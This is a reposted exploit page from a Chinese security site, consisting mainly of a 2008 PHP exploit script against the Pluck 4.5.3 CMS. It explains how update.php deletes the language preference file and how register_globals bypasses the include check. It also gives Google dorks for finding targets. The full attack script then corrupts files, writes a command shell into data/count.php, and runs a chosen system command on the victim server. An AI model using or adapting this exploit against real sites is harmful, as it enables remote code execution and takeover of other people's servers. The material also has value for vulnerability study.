首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Pluck 4.5.3 (update.php) Remote File Corruption Exploit 来源：http://retrogod.altervista.org 作者：Nine 发布时间：2008-09-19   <?php         /*          Pluck 4.5.3 update.php remote file corruption exploit          by Nine:Situations:Group::bookoo          our site: http://retrogod.altervista.org/             Google dorks: "powered by pluck" +admin                        inurl:file=kop1.php                        inurl:file=kop2.php                        ...                            Exploit condition : register_globals = on          Note(!): regardless of php.ini settings, this code will turn your host in a blank page ...          Vulnerability:          this program carries a dangerous update.php script. If reachable          in the main folder, you can delete the files with language and theme preferences:          ...          $step = $_GET['step'];          ...          ...          elseif($step == "3") {          echo "Rearranging files for compatibility with pluck 4.5...<br>";          copy("data/title.dat", "data/settings/title.dat");          unlink("data/settings/install.dat");          copy("data/install.dat", "data/settings/install.dat");          copy("data/options.php", "data/settings/options.php");          copy("data/pass.php", "data/settings/pass.php");          unlink("data/settings/langpref.php");          copy("data/inc/lang/langpref.php", "data/settings/langpref.php");          unlink("data/settings/themepref.php");          copy("data/inc/themes/themepref.php", "data/settings/themepref.php");          ...          see the unlink() calls... the subsequent copy() has no results if you          don't place the source files there...          Now look at index.php, lines 21-26:                   ...          //Include security-enhancements          include ("data/inc/security.php");          //Include Translation data          include ("data/settings/langpref.php");          include ("data/inc/lang/en.php");          include ("data/inc/lang/$langpref");          ...          The script now fails to include the langpref.php script and "langpref" variable is not initialized then,          ***if register_globals=on*** you can include arbitraty files from local resources.                  This check in security.php doesn't work as expected :          ...          //Register Globals          //If Register Globals are ON, unset injected variables          if(isset($_REQUEST)) {    foreach ($_REQUEST as $key => $value) { if(isset($GLOBALS[$key])) { unset($GLOBALS[$key]);     }       }          }          ...          ex: http://host/path/index.php?GLOBALS[langpref]=1          It unsets the "GLOBALS" key from the GLOBALS[] array, while langpref variable remains          overwritten...          You can include the /data/inc/page_editmeta.php script which contains a nice php injection:          ...          if(isset($_POST['Submit'])) {          $data = "data/content/$editmeta";          include("data/inc/page_stripslashes.php");          $file = fopen($data, "w");           fputs($file, "<?php          \$title = \"$title\";          \$content = \"$content\";          \$contactinc = \"$contactinc\";          \$hidden = \"$hidden\";          \$description = \"$cont1\";          \$keywords = \"$sleutel\";          \$copyright = \"$copyr\";");          //Check if we also need to include albums          if ($incalbum) {          foreach ($incalbum as $name => $value) {          fputs($file, "\n\$incalbum['$name'] = \"yes\";");          } }          //Check if we also need to include blogs          if ($incblog) {          foreach ($incblog as $name => $value) {          fputs($file, "\n\$incblog['$name'] = \"yes\";");          } }          fputs($file, "\n ?>");          fclose($file);          ...          also this check in /data/inc/page_editmeta.php is unuseful because          you call it from the main script:                   ...          //Make sure the file isn't accessed directly          if((!ereg("index.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("admin.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("install.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("login.php", $_SERVER['SCRIPT_FILENAME']))){          //Give out an "access denied" error          echo "access denied";          //Block all other code          exit();          }          ...          We choose the /data/count.php to inject a php shell then you can launch commands on the target server.                                  */         $cmd = "uname";//change here                 error_reporting(7);         $host=$argv[1];         $path=$argv[2];         $argv[3] ? $port = (int) $argv[3] : $port = 80;         $argv[2] ? print("attackin'...\n") : die ("syntax: php ".$argv[0]." [host] [path] [[port]]");         $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;         $win ? dl("php_curl.dll") : dl("php_curl.so");         $url = "http://$host:$port";              function send($url,$header)         {             $ch = curl_init();             curl_setopt($ch, CURLOPT_URL,$url);             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);             curl_setopt($ch, CURLOPT_TIMEOUT, 0);             curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header);             $data = curl_exec($ch); if (curl_errno($ch)) {             print curl_error($ch)."\n";             } else {                curl_close($ch);             }             sleep(1);             return $data."\n";                     }         $agent = "Mozilla</b>/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";         $header ="GET ".$path."update.php?step=3 HTTP/1.0\r\n";         $header.="Host: $host\r\nUser-Agent: $agent\r\nConnection: Close\r\n\r\n";         send($url,$header);         //oh, how evil... tested and working against PHP 5.2.4         $header ="POST ".$path."index.php HTTP/1.0\r\n";         $header.="Host: $host\r\nUser-Agent: $agent\r\n";         $header.="Content-Type: application/x-www-form-urlencoded\r\n";         $header.="Content-Length: 218\r\n";         $header.="Connection: Close\r\n\r\n";         $header.="Submit=1&GLOBALS[langpref]=../page_editmeta.php&GLOBALS[editmeta]=../count.php&GLOBALS[sleutel]=\$x{\$y{error_reporting(0)}}\$x{\$y{set_time_limit(0)}}\$x{\$y{print(my_flag)}}\$x{\$y{passthru(\$_SERVER[HTTP_CMD])}}\$x{\$y{die()}}";         send($url,$header);         $header ="GET ".$path."data/count.php HTTP/1.0\r\n";         $header.="Host: $host\r\nUser-Agent: $agent\r\n";         $header.="CMD: $cmd\r\n";         $header.="Connection: Close\r\n\r\n";         $out=send($url,$header);         $out=explode("my_flag",$out);         count($out)==2 ? print("exploit succeeded...\n$out[1]") : print("exploit failed... :(\n"); ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·NuMedia Soft NMS DVD Burning S ·DESlock+ <= 3.2.7 Local Kernel ·addalink <= 4 Arbitrary Admin ·DESlock+ <= 3.2.7 Local Kernel ·Femitter FTP Server 1.03 (RETR ·DESlock+ <= 3.2.7 (probe read) ·Cisco Router HTTP Administrati ·Invision Power Board <= 2.3.5 ·Cisco Router HTTP Administrati ·DESlock+ 3.2.7 (vdlptokn.sys) ·WonderWare SuiteLink 2.0 Remot ·foxmail 0day POC   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved